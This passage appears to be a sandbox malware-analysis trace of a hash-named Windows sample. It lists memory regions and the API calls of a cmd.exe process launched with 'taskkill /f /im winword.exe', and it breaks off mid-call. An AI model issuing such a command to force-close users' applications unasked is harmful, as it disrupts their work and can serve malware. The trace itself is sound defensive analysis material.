0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5895 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5896 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5897 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5898 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5899 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5900 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5901 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5902 start_va = 0x500000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5903 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5904 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5905 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5906 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5907 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5908 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5909 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5910 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5911 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 5912 start_va = 0x790000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 5913 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5914 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5915 start_va = 0x8f0000 end_va = 0xc26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 413 os_tid = 0x560 [0227.596] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0227.596] __set_app_type (_Type=0x1) [0227.596] __p__fmode () returned 0x74974d6c [0227.596] __p__commode () returned 0x74975b1c [0227.596] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0227.597] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0227.597] GetCurrentThreadId () returned 0x560 [0227.597] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x560) returned 0x78 [0227.597] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0227.597] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0227.597] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.602] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.602] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0227.603] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.603] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0227.603] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0227.603] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.603] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0227.603] GetConsoleOutputCP () returned 0x1b5 [0227.603] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0227.604] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0227.604] _get_osfhandle (_FileHandle=1) returned 0x154 [0227.604] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0227.604] _get_osfhandle (_FileHandle=1) returned 0x154 [0227.604] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0227.604] _get_osfhandle (_FileHandle=0) returned 0x144 [0227.604] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0227.604] GetEnvironmentStringsW () returned 0x697cc0* [0227.604] GetProcessHeap () returned 0x690000 [0227.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa1a) returned 0x6986e8 [0227.604] FreeEnvironmentStringsA (penv="A") returned 1 [0227.604] GetProcessHeap () returned 0x690000 [0227.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x690550 [0227.604] GetEnvironmentStringsW () returned 0x697cc0* [0227.604] GetProcessHeap () returned 0x690000 [0227.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa1a) returned 0x699110 [0227.605] FreeEnvironmentStringsA (penv="A") returned 1 [0227.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0227.605] RegCloseKey (hKey=0x88) returned 0x0 [0227.605] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.605] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0227.606] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.606] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.606] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0227.606] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0227.606] RegCloseKey (hKey=0x88) returned 0x0 [0227.606] time (in: timer=0x0 | out: timer=0x0) returned 0x62344252 [0227.606] srand (_Seed=0x62344252) [0227.606] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im winword.exe \"" [0227.606] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im winword.exe \"" [0227.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0227.606] GetProcessHeap () returned 0x690000 [0227.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x699b38 [0227.606] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x699b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0227.606] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0227.607] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0227.607] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.607] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0227.607] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0227.607] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0227.607] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0227.607] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0227.607] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0227.607] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0227.607] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0227.607] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0227.607] GetProcessHeap () returned 0x690000 [0227.608] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6986e8) returned 1 [0227.608] GetEnvironmentStringsW () returned 0x697cc0* [0227.608] GetProcessHeap () returned 0x690000 [0227.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa32) returned 0x69a790 [0227.608] FreeEnvironmentStringsA (penv="A") returned 1 [0227.608] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0227.608] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.608] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0227.608] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0227.608] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0227.609] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0227.609] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0227.609] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0227.609] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0227.609] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0227.609] GetProcessHeap () returned 0x690000 [0227.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x44) returned 0x6905c8 [0227.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0227.609] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0227.609] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0227.609] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x690618 [0227.609] FindClose (in: hFindFile=0x690618 | out: hFindFile=0x690618) returned 1 [0227.610] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x690618 [0227.610] FindClose (in: hFindFile=0x690618 | out: hFindFile=0x690618) returned 1 [0227.610] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0227.610] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x690618 [0227.610] FindClose (in: hFindFile=0x690618 | out: hFindFile=0x690618) returned 1 [0227.610] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0227.610] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0227.610] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0227.610] GetProcessHeap () returned 0x690000 [0227.611] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69a790) returned 1 [0227.611] GetEnvironmentStringsW () returned 0x697cc0* [0227.611] GetProcessHeap () returned 0x690000 [0227.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa76) returned 0x699d50 [0227.611] FreeEnvironmentStringsA (penv="=") returned 1 [0227.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0227.611] GetProcessHeap () returned 0x690000 [0227.611] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6905c8) returned 1 [0227.612] GetProcessHeap () returned 0x690000 [0227.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x69bc50 [0227.612] GetProcessHeap () returned 0x690000 [0227.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4a) returned 0x69a7d0 [0227.612] GetProcessHeap () returned 0x690000 [0227.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x69fc68 [0227.613] GetProcessHeap () returned 0x690000 [0227.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x6a3c78 [0227.614] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0227.614] GetProcessHeap () returned 0x690000 [0227.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x69a828 [0227.615] SetErrorMode (uMode=0x0) returned 0x8003 [0227.615] SetErrorMode (uMode=0x1) returned 0x0 [0227.615] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x69a830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0227.615] SetErrorMode (uMode=0x8003) returned 0x1 [0227.615] GetProcessHeap () returned 0x690000 [0227.615] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a828, Size=0x7c) returned 0x69a828 [0227.615] GetProcessHeap () returned 0x690000 [0227.615] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a828) returned 0x7c [0227.615] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0227.615] GetProcessHeap () returned 0x690000 [0227.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x62) returned 0x69a8b0 [0227.615] GetProcessHeap () returned 0x690000 [0227.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb8) returned 0x69a920 [0227.615] GetProcessHeap () returned 0x690000 [0227.616] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a920, Size=0x62) returned 0x69a920 [0227.616] GetProcessHeap () returned 0x690000 [0227.616] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a920) returned 0x62 [0227.616] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0227.616] GetProcessHeap () returned 0x690000 [0227.616] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x69a990 [0227.620] GetProcessHeap () returned 0x690000 [0227.620] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a990, Size=0x76) returned 0x69a990 [0227.620] GetProcessHeap () returned 0x690000 [0227.620] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a990) returned 0x76 [0227.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0227.621] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im winword.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0227.621] GetLastError () returned 0x3 [0227.621] GetProcessHeap () returned 0x690000 [0227.621] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69fc68) returned 1 [0227.621] GetProcessHeap () returned 0x690000 [0227.622] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6a3c78) returned 1 [0227.622] GetProcessHeap () returned 0x690000 [0227.622] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69bc50) returned 1 [0227.622] GetConsoleOutputCP () returned 0x1b5 [0227.623] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0227.623] GetUserDefaultLCID () returned 0x409 [0227.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0227.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0227.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0227.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0227.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0227.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0227.624] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0227.624] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0227.625] GetProcessHeap () returned 0x690000 [0227.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x69aa58 [0227.626] GetConsoleTitleW (in: lpConsoleTitle=0x69aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0227.626] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0227.626] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0227.626] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0227.626] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0227.626] GetProcessHeap () returned 0x690000 [0227.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x69bc50 [0227.626] GetProcessHeap () returned 0x690000 [0227.627] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69bc50) returned 1 [0227.628] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0227.628] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0227.628] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0227.628] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0227.628] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0227.628] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0227.628] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0227.628] GetProcessHeap () returned 0x690000 [0227.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x69ac70 [0227.628] GetProcessHeap () returned 0x690000 [0227.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1a) returned 0x690578 [0227.629] GetProcessHeap () returned 0x690000 [0227.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x32) returned 0x69acd0 [0227.630] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0227.631] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0227.631] _wcsicmp (_String1="taskkill", 